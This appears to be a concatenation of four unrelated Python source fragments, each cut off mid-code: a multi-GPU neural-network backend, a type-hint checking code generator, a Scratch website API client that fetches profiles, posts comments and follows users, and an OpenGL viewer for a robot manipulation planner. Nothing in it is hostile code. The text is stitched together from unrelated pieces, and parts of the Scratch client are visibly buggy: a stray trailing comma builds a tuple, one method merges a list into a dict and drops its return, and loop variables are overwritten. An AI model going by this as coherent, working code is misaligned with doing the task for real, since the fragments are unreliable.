v, MGPUTensor) else v for k, v in kwargs.iteritems()}
getattr(super(MGPU, self), method)(*myargs, **mykwargs)
self.ng.stream = None
ctx.pop()
self.call_stack = None
else:
pass
@property
def strms(self):
return self._strms if self.async else self._nostrms
@property
def redstrms(self):
return self._redstrms if self.async else self._nostrms
def uniform(self, low=0.0, high=1.0, size=1, dtype=default_dtype,
name=None, persist_values=True, ptype='replica'):
"""
generate numpy random number and convert to a GPUTensor.
If called with dtype=None it will probably explode
"""
assert len(size) == 2
result = self.empty(size, dtype=dtype, persist_values=persist_values)
result.ptype = ptype
beshape = size if ptype == 'replica' else (self.num_dev * size[0],
size[1])
ary = np.random.uniform(low, high, beshape).astype(dtype)
self.set(result, ary)
return result
def normal(self, loc=0.0, scale=1.0, size=1, dtype=default_dtype,
name=None, persist_values=True, ptype='replica'):
"""
Gaussian/Normal random number sample generation
"""
assert len(size) == 2
result = self.empty(size, dtype=dtype, persist_values=persist_values)
result.ptype = ptype
beshape = size if ptype == 'replica' else (self.num_dev * size[0],
size[1])
ary = np.random.normal(loc, scale, beshape).astype(dtype)
self.set(result, ary)
return result
def synchronize(self):
if not self.async:
return
for s in self.strms:
s.synchronize()
def redsynchronize(self):
if not self.async:
return
for s in self.redstrms:
s.synchronize()
def allocate_fragment(self, shape, dtype=default_dtype,
persist_values=True):
# TODO: set ptype to be fragment in this case ??
return self.empty((shape[0], shape[1] / self.num_dev), dtype,
persist_values=persist_values)
def zeros_like(self, ary, dtype=default_dtype, persist_values=True,
name=None):
result = self.zeros(ary.shape, dtype=dtype,
persist_values=persist_values)
result.ptype = ary.ptype
return result
def empty_like(self, ary, dtype=default_dtype, persist_values=True,
name=None):
result = self.empty(ary.shape, dtype=dtype,
persist_values=persist_values, name=name)
result.ptype = ary.ptype
return result
def set(self, tensor, data):
assert isinstance(tensor, MGPUTensor)
if tensor.ptype == 'replica':
for dest, strm, ctx in zip(tensor.tlist, self.strms, self.ctxs):
ctx.push()
drv.memcpy_htod_async(dest.ptr, data, strm)
ctx.pop()
# tensor.copy_from(data)
else:
self.scatter(data, tensor)
def scatter(self, hbuf, dbuf):
'''
scatters the array data in hbuf to the mgpu tensor
assumes that dbuf is a M x N and hbuf is M x (Nxk) where k is the
number of replicas
also assumes that dtype of hbuf and dbuf are the same
'''
assert hbuf.size == dbuf.size * dbuf.num_dev
assert isinstance(dbuf, MGPUTensor)
assert hbuf.dtype == dbuf.dtype
ndata = dbuf.size
starts = [i * ndata for i in range(self.num_dev)]
for dest, strm, ctx, doff in zip(dbuf.tlist, self.strms, self.ctxs,
starts):
src = hbuf.reshape((hbuf.size))[doff:(doff + ndata)]
ctx.push()
drv.memcpy_htod_async(dest.ptr, src, strm)
ctx.pop()
self.synchronize()
def fprop_fc(self, out, inputs, weights, layer=None):
"""
In this case, the weights are shards, the acts are replicas
ubuf should be of size nout/num_dev x mbsz
"""
ubuf = layer.mempool[0]
assert ubuf.shape == (weights.shape[0], inputs.shape[1])
if layer.use_biases:
biases = layer.biases.tlist
else:
biases = [None for i in range(self.num_dev)]
for dbuf, ibuf, wt, bs, strm, ctx in zip(ubuf.tlist, inputs.tlist,
weights.tlist, biases,
self.strms, self.ctxs):
ctx.push()
self.ng.stream = strm
self.ng.dot(wt, ibuf, dbuf)
if layer.use_biases:
self.ng.add(dbuf, bs, out=dbuf)
ctx.pop()
# Note, should be safe not to sync because each fragment is computed
# on the same stream that originates the copy
# self.synchronize()
self.fragment_to_replica(ubuf, out)
def bprop_fc(self, out, weights, deltas, layer=None):
"""
Backward propagate the error through a fully connected network layer.
Arguments:
out (GPUTensor): Where to store the backward propagated errors.
weights (GPUTensor): The weight coefficient values for this layer.
deltas (GPUTensor): The error values for this layer
layer (Layer): The layer object.
"""
ubuf = layer.mempool[1]
wtsz = weights.shape[0]
starts = [i * wtsz for i in range(self.num_dev)]
assert out.shape == (weights.shape[1], deltas.shape[1])
assert ubuf.shape == out.shape
for dbuf, ibuf, wt, strm, ctx, off in zip(out.tlist, deltas.tlist,
weights.tlist, self.strms,
self.ctxs, starts):
ctx.push()
self.ng.stream = strm
self.ng.dot(wt.T, ibuf[off:(off + wtsz)], dbuf)
ctx.pop()
# Note, should be safe not to sync because each fragment is computed
# on the same stream that originates the copy
self.synchronize()
self.reduce(out, ubuf)
def update_fc(self, out, inputs, deltas, layer=None):
wtsz | |
the current pith
# into the "{obj}" variable already embedded by
# that class into this code.
hint_child_expr=(
hint_child._is_valid_code.format(
indent=indent_child,
obj=pith_curr_var_name,
)),
))
# Generate locals safely merging the locals required by
# both this validator code *AND* the current code
# type-checking this entire root hint.
update_mapping(
mapping_trg=func_wrapper_locals,
mapping_src=hint_child._is_valid_code_locals,
)
# Munge this code to...
func_curr_code = (
# Strip the erroneous " and" suffix appended by the
# last child hint from this code.
f'{func_curr_code[:_LINE_RSTRIP_INDEX_AND]}'
# Suffix this code by the substring suffixing all such
# code.
f'{PEP593_CODE_HINT_VALIDATOR_SUFFIX_format(indent_curr=indent_curr)}'
)
# Else, this hint is *NOT* a metahint.
#
# ............{ SUBCLASS }............
# If this hint is either a PEP 484- or 585-compliant subclass
# type hint...
elif hint_curr_sign is HintSignType:
#FIXME: Optimization: if the superclass is an ignorable
#class (e.g., "object", "Protocol"), this type hint is
#ignorable (e.g., "Type[object]", "type[Protocol]"). We'll
#thus want to:
#* Add that detection logic to one or more
# is_hint_*_ignorable() testers elsewhere.
#* Call is_hint_ignorable() below.
#* Unit test such type hints to indeed be ignorable.
# Superclass this pith is required to be a subclass of.
hint_child = get_hint_pep484585_subclass_superclass(
hint=hint_curr, exception_prefix=hint_curr_exception_prefix)
#FIXME: Unit test us up, please.
# If this superclass is either a class *OR* tuple of
# classes...
if isinstance(hint_child, TestableTypes):
# Python expression evaluating to this superclass.
hint_curr_expr = add_func_scope_type_or_types(
type_or_types=hint_child, # type: ignore[arg-type]
func_scope=func_wrapper_locals,
exception_prefix=(
_EXCEPTION_PREFIX_FUNC_WRAPPER_LOCAL),
)
#FIXME: *UNIT TEST THIS PLEASE.*
# Else, this superclass is *NOT* actually a class. By
# process of elimination and the validation already
# performed above by the
# get_hint_pep484585_subclass_superclass() getter, this
# superclass *MUST* be a forward reference to a class.
else:
# Render this forward reference accessible to the body
# of this wrapper function. See above for commentary.
hint_curr_expr, hint_forwardrefs_class_basename = (
express_func_scope_type_forwardref(
forwardref=hint_child,
forwardrefs_class_basename=(
hint_forwardrefs_class_basename),
func_scope=func_wrapper_locals,
))
# Code type-checking this pith against this superclass.
func_curr_code = PEP484585_CODE_HINT_SUBCLASS_format(
pith_curr_assign_expr=pith_curr_assign_expr,
pith_curr_var_name=pith_curr_var_name,
hint_curr_expr=hint_curr_expr,
indent_curr=indent_curr,
)
# Else, this hint is neither a PEP 484- nor 585-compliant
# subclass type hint.
#
# ............{ GENERIC or PROTOCOL }............
# If this hint is either a:
# * PEP 484-compliant generic (i.e., user-defined class
# subclassing a combination of one or more of the
# "typing.Generic" superclass and other "typing" non-class
# pseudo-superclasses) *OR*...
# * PEP 544-compliant protocol (i.e., class subclassing a
# combination of one or more of the "typing.Protocol"
# superclass and other "typing" non-class
# pseudo-superclasses) *OR*...
# * PEP 585-compliant generic (i.e., user-defined class
# subclassing at least one non-class PEP 585-compliant
# pseudo-superclasses) *OR*...
# Then this hint is a PEP-compliant generic. In this case...
elif hint_curr_sign is HintSignGeneric:
#FIXME: *THIS IS NON-IDEAL.* Ideally, we should propagate
#*ALL* child type hints subscripting a generic up to *ALL*
#pseudo-superclasses of that generic (e.g., the "int" child
#hint subscripting a parent hint "MuhGeneric[int]" of type
#"class MuhGeneric(list[T]): pass" up to its "list[T]"
#pseudo-superclass).
#
#For now, we just strip *ALL* child type hints subscripting
#a generic with the following call. This suffices, because
#we just need this to work. So it goes, uneasy code
#bedfellows.
# If this hint is *NOT* a class, this hint is *NOT* an
# unsubscripted generic but could still be a generic
# subscripted by one or more PEP-compliant child hints.
#
# To decide, reduce this hint to the object originating
# this hint if any, enabling the subsequent assertion to
# assert whether this origin object is an unsubscripted
# generic, which would then imply this hint to be a
# subscripted generic. If this strikes you as insane,
# you're not alone.
hint_curr = get_hint_pep484585_generic_type(
hint=hint_curr,
exception_prefix=hint_curr_exception_prefix,
)
# Tuple of the one or more unerased pseudo-superclasses
# originally listed as superclasses prior to their type
# erasure by this generic.
hint_childs = get_hint_pep484585_generic_bases_unerased(
hint=hint_curr, exception_prefix=hint_curr_exception_prefix)
# Initialize the code type-checking this pith against this
# generic to the substring prefixing all such code.
func_curr_code = PEP484585_CODE_HINT_GENERIC_PREFIX
# For each pseudo-superclass subclassed by this generic...
for hint_child in hint_childs:
# print(f'hint_child: {repr(hint_child)} {is_hint_pep_type_typing(hint_child)}')
# If this pseudo-superclass is an actual class, this
# class is effectively ignorable. Why? Because the
# "PEP484585_CODE_HINT_GENERIC_PREFIX" snippet
# leveraged above already type-checks this pith against
# the generic subclassing this superclass and thus this
# superclass as well with a trivial isinstance() call.
# In this case, skip to the next pseudo-superclass.
if isinstance(hint_child, type):
continue
# Else, this pseudo-superclass is *NOT* a class.
#
# If this pseudo-superclass is neither a PEP
# 585-compliant type hint *NOR* a PEP-compliant type
# hint defined by the "typing" module, this
# pseudo-superclass *MUST* be a user-defined
# pseudo-superclass *NOT* compliant with PEP
# 585. In this case, reduce this pseudo-superclass to
# the corresponding actual superclass originating
# this pseudo-superclass. Note that:
# * This horrible, irrational, and unintuitive edge
# case arises *ONLY* for user-defined PEP
# 484-compliant generics and PEP 544-compliant
# protocols subclassing another user-defined generic
# or protocol superclass subscripted by one or more
# type variables: e.g.,
# >>> import typing as t
# >>> class UserProtocol(t.Protocol[t.AnyStr]): pass
# >>> class UserSubprotocol(UserProtocol[str], t.Protocol): pass
# >>> UserSubprotocol.__orig_bases__
# (UserProtocol[bytes], typing.Protocol)
# >>> UserProtocolUnerased = UserSubprotocol.__orig_bases__[0]
# >>> UserProtocolUnerased is UserProtocol
# False
# >>> isinstance(UserProtocolUnerased, type)
# False
# * PEP 585-compliant generics suffer no such issues:
# >>> from beartype._util.hint.pep.proposal.utilpep585 import is_hint_pep585_builtin
# >>> class UserGeneric(list[int]): pass
# >>> class UserSubgeneric(UserGeneric[int]): pass
# >>> UserSubgeneric.__orig_bases__
# (UserGeneric[int],)
# >>> UserGenericUnerased = UserSubgeneric.__orig_bases__[0]
# >>> isinstance(UserGenericUnerased, type)
# True
# >>> UserGenericUnerased.__mro__
# (UserGeneric, list, object)
# >>> is_hint_pep585_builtin(UserGenericUnerased)
# True
#
# Walking up the unerased inheritance hierarchy for
# this generic or protocol iteratively visits the
# user-defined generic or protocol pseudo-superclass
# subscripted by one or more type variable. Due to
# poorly defined obscurities in the "typing"
# implementation, this pseudo-superclass is *NOT*
# actually a class but rather an instance of a private
# "typing" class (e.g., "typing._SpecialForm").
#
# Ergo, this pseudo-superclass will be subsequently
# detected as neither a generic nor "typing" object and
# thus raise exceptions. Our only recourse is to
# silently reduce this hint into the erased superclass
# to which the "typing" module previously transformed
# this hint (e.g., "UserProtocol" above). This is
# slightly non-ideal, as this erased superclass is an
# actual class that should ideally be ignored rather
# than redundantly tested against the current pith
# again. Nonetheless, there exists no other means of
# recursing into the possibly relevant superclasses of
# this erased superclass.
#
# Note that, in theory, we could deeply refactor this
# whole algorithm to support the notion of child hints
# that should be ignored for purposes of type-checking
# but nonetheless recursed into. In practice, the
# current approach only introduces mild runtime
# inefficiencies while preserving sanity throughout
# this algorithm.
#
# Specifically, perform this awful reduction *ONLY* if
# this pseudo-superclass is a PEP 484- or 544-compliant
# user-defined pseudo-superclass that is neither...
elif not (
# A PEP 585-compliant pseudo-superclass *NOR*...
is_hint_pep585_builtin(hint_child) and
# A PEP 484- or 544-compliant pseudo-superclass
# defined by the "typing" module.
is_hint_pep_typing(hint_child)
):
hint_child = get_hint_pep484_generic_base_erased_from_unerased(
hint_child)
# Else, this pseudo-superclass is defined by the "typing"
# module.
# If this superclass is ignorable, do so.
if is_hint_ignorable(hint_child):
continue
# Else, this superclass is unignorable.
# Generate and append code type-checking this pith
# against this superclass.
func_curr_code += (
PEP484585_CODE_HINT_GENERIC_CHILD_format(
hint_child_placeholder=_enqueue_hint_child(
# Python expression efficiently reusing the
# value of this pith previously assigned to
# a local variable by the prior prefix.
pith_curr_var_name),
))
# Munge this code to...
func_curr_code = (
# Strip the erroneous " and" suffix appended by the
# | |
import requests
import json
from .UserProfiles import YourUserProfile, AnotherUserProfile
from .Project import YourProject, AnotherProject
from bs4 import BeautifulSoup
from .Comments import UserComment
import re
class YourUser:
def __init__(self, data, client):
self.id = data["id"]
self.username = data["username"]
self.joined_timestamp = data["history"]["joined"]
self.scratchteam = data["scratchteam"]
self.scrather = requests.get(f"https://isscratcher.9pfs.repl.co/api/" + self.username).json()["isScratcher"]
self.profile = YourUserProfile(data["profile"], self)
self._client = client
self._headers = {
"x-csrftoken": self._client.csrf_token,
"X-Token": self._client.token,
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchcsrftoken="
+ self._client.csrf_token
+ ";scratchlanguage=en;scratchsessionsid="
+ self._client.session_id
+ ";",
"referer": "https://scratch.mit.edu/users/" + self.username + "/",
}
def get_projects(self, all=False, limit=20, offset=0):
if all:
projects = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/projects/"
+ "?limit=40&offset="
+ str(offset)
).json()
projects += res
if len(res) != 40:
break
offset += 40
for x, i in enumerate(projects):
projects[x].update({
"author": self.username
})
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
else:
projects = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/projects/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
for x, i in enumerate(projects):
projects[x].update({
"author": self.username
})
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
def get_curating(self, all=False, limit=20, offset=0):
if all:
studios = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/studios/curate"
+ "?limit=40&offset="
+ str(offset)
).json()
studios += res
if len(res) != 40:
break
offset += 40
return list(map(self._client._to_studio, studios))
else:
return list(
map(
self._client._to_studio,
requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/studios/curate/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
)
)
def get_favorites(self, all=False, limit=20, offset=0):
if all:
projects = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/favorites/"
+ "?limit=40&offset="
+ str(offset)
).json()
projects += res
if len(res) != 40:
break
offset += 40
for x, i in enumerate(projects):
projects[x]["author"] = self.username
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
else:
projects = list(
{
**requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/favorites/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
**{
"author": self.username
}}
)
[
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
def get_followers(self, all=False, limit=20, offset=0):
if all:
users = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/followers/"
+ "?limit=40&offset="
+ str(offset)
).json()
users += res
if len(res) != 40:
break
offset += 40
return [
YourUser(i, self._client) if i["username"] == self._client.username else AnotherUser(i,
self._client)
for i in users]
else:
users = list(
requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/followers/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
)
return [
YourUser(i, self._client) if i["username"] == self._client.username else AnotherUser(i,
self._client)
for i in users]
def get_following(self, all=False, limit=20, offset=0):
if all:
users = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/following/"
+ "?limit=40&offset="
+ str(offset)
).json()
users += res
if len(res) != 40:
break
offset += 40
return [
YourUser(i, self._client) if i["username"] == self._client.username else AnotherUser(i,
self._client)
for i in users]
else:
users = list(
requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/following/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
)
return [
YourUser(i, self._client) if i["username"] == self._client.username else AnotherUser(i,
self._client)
for i in users]
def get_message_count(self):
return requests.get(
"https://api.scratch.mit.edu/users/" + self.username + "/messages/count/"
).json()["count"]
def get_comments(self, page=1):
comments = []
soup = BeautifulSoup(
requests.get(f"https://scratch.mit.edu/site-api/comments/user/{self.username}/?page={page}").content,
"html.parser")
result = soup.find_all("li", class_="top-level-reply")
def get_replies(count):
'''
Retrieve replies to comment thread.
'''
# Extract reply list
replies = result[count].find("ul", class_="replies")
if replies.text == "":
# Detect empty reply chain
return None
else:
# Get DOM node containing user data for comment
user = replies.find_all("div", class_="info")
# print(user)
# Initialize array with name "all_replies"
all_replies = []
# Iterate through reply list and extract username
for i in range(0, len(user)):
# Get username section. Probably does it like this to save memory.
username = user[i].find("div", class_="name")
# Redefine username as the actual username element
username = username.find("a").text
# Get post content
content = user[i].find("div", class_="content").text
# Trim username newlines
username = username.strip().replace("\n", "")
# Trim post content newlines
content = content.strip().replace("\n", "")
# Get comment IDs
search = re.search("data-comment-id=", str(result[i]))
# Get post position in reply list
index = search.span()[1]
data = str(result[i])[index + 1:]
i = 0
id = ""
while data[i] != '"':
id += data[i]
i += 1
id = int(id)
# Get post numbers (I think)
search = re.search("title=", str(result[i]))
index = search.span()[1]
data = str(result[i])[index + 1:]
i = 0
comment_time = ""
while data[i] != '"':
comment_time += data[i]
i += 1
reply = {"id": id, "username": username, "comment": content.replace(" ", ""),
"timestamp": comment_time}
all_replies.append(reply)
return all_replies
for i in range(0, len(result)):
user = result[i].find("div", class_="comment")
replies = get_replies(i)
user = user.find("div", class_="info")
user = user.find("div", class_="name")
user = user.find("a")
user = user.text
content = result[i].find("div", class_="comment")
content = content.find("div", class_="info")
content = content.find("div", class_="content")
content = content.text.strip()
search = re.search("data-comment-id=", str(result[i]))
index = search.span()[1]
data = str(result[i])[index + 1:]
i = 0
id = ""
while data[i] != '"':
id += data[i]
i += 1
id = int(id)
search = re.search("title=", str(result[i]))
index = search.span()[1]
data = str(result[i])[index + 1:]
i = 0
comment_time = ""
while data[i] != '"':
comment_time += data[i]
i += 1
if len(replies) == 0:
parent = True
else:
parent = False
comment = {
"Username": user,
"Content": content,
"Time": comment_time,
"IsReply": parent,
"Replies": replies,
"CommentID": id
}
comments.append(comment)
# Return a list of comments
return map(lambda data: UserComment(data, self._client, self._headers), comments)
def post_comment(self, content, parent_id="", commentee_id=""):
data = {
"commentee_id": commentee_id,
"content": content,
"parent_id": parent_id,
}
requests.post(
"https://scratch.mit.edu/site-api/comments/user/" + self.username + "/add/",
headers=self._headers,
data=json.dumps(data),
)
def report(self, field):
data = {"selected_field": field}
requests.post(
"https://scratch.mit.edu/site-api/users/all/" + self.username + "/report/",
headers=self._headers,
data=json.dumps(data),
)
def toggle_commenting(self):
requests.post(
"https://scratch.mit.edu/site-api/comments/user/"
+ self.username
+ "/toggle-comments/",
headers=self._headers,
)
def follow(self):
return requests.put(
"https://scratch.mit.edu/site-api/users/followers/"
+ self.username
+ "/add/?usernames="
+ self._client.username,
headers=self._headers,
).json()
def unfollow(self):
return requests.put(
"https://scratch.mit.edu/site-api/users/followers/"
+ self.username
+ "/remove/?usernames="
+ self._client.username,
headers=self._headers,
).json()
class AnotherUser:
def __init__(self, data, client):
self.id = data["id"]
self.username = data["username"]
self.joined_timestamp = data["history"]["joined"]
self.scratchteam = data["scratchteam"]
self.scrather = requests.get(f"https://isscratcher.9pfs.repl.co/api/" + self.username).json()["isScratcher"]
self.profile = AnotherUserProfile(data["profile"], self)
self._client = client
self._headers = {
"x-csrftoken": self._client.csrf_token,
"X-Token": self._client.token,
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchcsrftoken="
+ self._client.csrf_token
+ ";scratchlanguage=en;scratchsessionsid="
+ self._client.session_id
+ ";",
"referer": "https://scratch.mit.edu/users/" + self.username + "/",
}
def get_projects(self, all=False, limit=20, offset=0):
if all:
projects = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/projects/"
+ "?limit=40&offset="
+ str(offset)
).json()
projects += res
if len(res) != 40:
break
offset += 40
for x, i in enumerate(projects):
projects[x].update({
"author": self.username
})
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
else:
projects = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/projects/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
for x, i in enumerate(projects):
projects[x].update({
"author": self.username
})
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
def get_curating(self, all=False, limit=20, offset=0):
if all:
studios = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/studios/curate"
+ "?limit=40&offset="
+ str(offset)
).json()
studios += res
if len(res) != 40:
break
offset += 40
return list(map(self._client._to_studio, studios))
else:
return list(
map(
self._client._to_studio,
requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/studios/curate/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
)
)
def get_favorites(self, all=False, limit=20, offset=0):
if all:
projects = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/favorites/"
+ "?limit=40&offset="
+ str(offset)
).json()
projects += res
if len(res) != 40:
break
offset += 40
for x, i in enumerate(projects):
projects[x]["author"] = self.username
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
else:
projects = list(
{
**requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/favorites/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
**{
"author": | |
from time import time
import glm
from itbl import Ray, Shader
from itbl.accelerators import SDF, BVHAccel
from itbl.cameras import TrackballCamera
from itbl.shapes import Box
from itbl.util import get_color, get_data
from itbl.viewer import Application, Viewer
from itbl.viewer.backend import *
from wilson import *
import itbl._itbl as _itbl
import time
from kinorrt.search_space import SearchSpace
from kinorrt.mechanics.contact_kinematics import *
import random
from kinorrt.mechanics.stability_margin import *
from kinorrt.rrt import RRTManipulation
import plotly.graph_objects as go
class iTM2d(Application):
def __init__(self, object_shape, example='sofa'):
# Initialize scene.
super(iTM2d, self).__init__(None)
self.mesh = Box(1.0, 0.5, 0.2)
self.light_box = Box(0.2, 0.2, 0.2)
self.example = example
self.object_shape = object_shape
def init(self):
super(iTM2d, self).init()
# Basic lighting shader.
vertex_source = os.path.join(get_data(), 'shader', 'basic_lighting.vs')
fragment_source = os.path.join(get_data(), 'shader', 'basic_lighting.fs')
self.basic_lighting_shader = Shader(vertex_source, fragment_source)
# Lamp shader.
vertex_source = os.path.join(get_data(), 'shader', 'flat.vs')
fragment_source = os.path.join(get_data(), 'shader', 'flat.fs')
self.lamp_shader = Shader(vertex_source, fragment_source)
# Normal shader.
vertex_source = os.path.join(get_data(), 'shader', 'normals.vs')
fragment_source = os.path.join(get_data(), 'shader', 'normals.fs')
geometry_source = os.path.join(get_data(), 'shader', 'normals.gs')
self.normal_shader = Shader(vertex_source, fragment_source, geometry_source)
# Trackball camera.
self.camera = TrackballCamera(radius=50)
# Toggle variables.
self.draw_mesh = True
self.draw_wireframe = True
self.draw_normals = False
def init2(self):
# C++ OpenGL.
_itbl.loadOpenGL()
# 2D shader.
vertex_source = os.path.join(get_data(), 'shader', '2d.vs')
fragment_source = os.path.join(get_data(), 'shader', '2d.fs')
self.flat_shader = Shader(vertex_source, fragment_source)
# Object
self.env_contacts = None
self.manip_contacts = None
self.env_contacts = None
self.manifold = None
self.v_m = None
self.counter = 0
self.target = _itbl.Rectangle(self.object_shape[0] * 2, self.object_shape[1] * 2, 2, 0.0)
if self.example == 'sofa':
self.collision_manager = create_hallway(HALLWAY_W, BLOCK_W, BLOCK_H, self.object_shape[
0] * 2.5 + BLOCK_W * 0.5) # uniform_sample_maze((4,4), 3, 1.25)
elif self.example == 'maze':
self.collision_manager = uniform_sample_maze((3, 3), 3, 1.25)
elif self.example == 'corner':
self.collision_manager = corner()
elif self.example == 'wall':
self.collision_manager = wall()
elif self.example == 'table':
self.collision_manager = corner()
elif self.example == 'obstacle_course':
self.collision_manager = obstacle_course()
elif self.example == 'peg-in-hole-v':
self.collision_manager = peg_in_hole_v()
elif self.example == 'peg-in-hole-p':
self.collision_manager = peg_in_hole_p()
elif self.example == 'book':
self.collision_manager = book()
elif self.example == 'unpacking':
self.collision_manager = unpacking()
else:
print('Cannot find collision manager!')
raise
self.all_configs_on = False
self.step_on = False
self.path_on = False
self.manip_p = None
self.next_manip_p = None
def draw_manifold(self):
if self.manifold is None:
return
glPointSize(5)
manifold = self.manifold
for i in range(len(manifold.depths)):
glBegin(GL_POINTS)
cp = manifold.contact_points[i]
glVertex3f(cp[0], cp[1], 1)
glEnd()
glBegin(GL_LINES)
d = manifold.depths[i]
n = manifold.normals[i]
cq = cp - d * n
glVertex3f(cp[0], cp[1], 1)
glVertex3f(cq[0], cq[1], 1)
glEnd()
def draw_ground(self):
glBegin(GL_LINES)
# ground line
glVertex3f(-10, 0, -1)
glVertex3f(10, 0, -1)
# hashes
for x in np.arange(-10, 10, 0.1):
glVertex3f(x, 0, -1)
glVertex3f(x - 0.1, -0.1, -1)
glEnd()
def draw_grid(self, size, step):
glBegin(GL_LINES)
glColor3f(0.3, 0.3, 0.3)
for i in np.arange(step, size, step):
glVertex3f(-size, i, 0) # lines parallel to X-axis
glVertex3f(size, i, 0)
glVertex3f(-size, -i, 0) # lines parallel to X-axis
glVertex3f(size, -i, 0)
glVertex3f(i, -size, 0) # lines parallel to Z-axis
glVertex3f(i, size, 0)
glVertex3f(-i, -size, 0) # lines parallel to Z-axis
glVertex3f(-i, size, 0)
# x-axis
glColor3f(0.5, 0, 0)
glVertex3f(-size, 0, 0)
glVertex3f(size, 0, 0)
# z-axis
glColor3f(0, 0, 0.5)
glVertex3f(0, -size, 0)
glVertex3f(0, size, 0)
glEnd()
def render(self):
glClearColor(0.2, 0.3, 0.3, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glEnable(GL_DEPTH_TEST)
glEnable(GL_MULTISAMPLE)
glEnable(GL_BLEND)
# glEnable(GL_CULL_FACE)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
self.basic_lighting_shader.use()
print_opengl_error()
model = glm.mat4(1.0)
self.basic_lighting_shader.set_mat4('model', np.asarray(model))
view = self.camera.get_view()
self.basic_lighting_shader.set_mat4('view', np.asarray(view))
projection = glm.perspective(glm.radians(45.0), 1200. / 900, 0.1, 100.0)
self.basic_lighting_shader.set_mat4('projection', np.asarray(projection))
# colors
# self.basic_lighting_shader.set_vec3('objectColor', np.array([1.0, 0.5, 0.31], 'f'))
self.basic_lighting_shader.set_vec3('lightColor', np.array([1.0, 1.0, 1.0], 'f'))
# light
lightPos = glm.vec3([1.00, 1.75, 10.0])
self.basic_lighting_shader.set_vec3('lightPos', np.asarray(lightPos))
# camera
cameraPos = glm.vec3(glm.column(glm.inverse(view), 3))
self.basic_lighting_shader.set_vec3('viewPos', np.asarray(cameraPos))
# Draw object.
if self.draw_mesh:
# Draw obstacles.
self.basic_lighting_shader.set_vec3('objectColor', get_color('gray'))
self.collision_manager.draw(self.basic_lighting_shader.id, True, True)
# Draw object.
self.basic_lighting_shader.set_vec3('objectColor', get_color('clay'))
self.target.draw3d(self.basic_lighting_shader.id)
# Draw normals.
self.normal_shader.use()
self.normal_shader.set_mat4('model', np.asarray(model))
self.normal_shader.set_mat4('view', np.asarray(view))
self.normal_shader.set_mat4('projection', np.asarray(projection))
if self.draw_normals:
self.mesh.draw(self.normal_shader)
# Draw edges and light.
self.lamp_shader.use()
self.lamp_shader.set_mat4('model', np.asarray(model))
self.lamp_shader.set_mat4('view', np.asarray(view))
self.lamp_shader.set_mat4('projection', np.asarray(projection))
self.lamp_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
if self.draw_wireframe:
# Draw object.
self.target.draw3d(self.lamp_shader.id)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
light_model = glm.mat4(1.0)
light_model = glm.translate(light_model, lightPos)
self.lamp_shader.set_mat4('model', np.asarray(light_model))
# self.light_box.draw(self.lamp_shader)
self.lamp_shader.set_mat4('model', np.asarray(model))
self.lamp_shader.set_vec3('objectColor', get_color('teal'))
model = glm.mat4(1.0)
self.lamp_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
self.lamp_shader.set_mat4('model', np.asarray(model))
# self.draw_grid(5, 0.25)
def render2(self):
glClearColor(0.2, 0.3, 0.3, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glEnable(GL_DEPTH_TEST)
glEnable(GL_MULTISAMPLE)
# glEnable(GL_BLEND)
# glEnable(GL_CULL_FACE)
# glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
# glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
self.flat_shader.use()
model = glm.mat4(1.0)
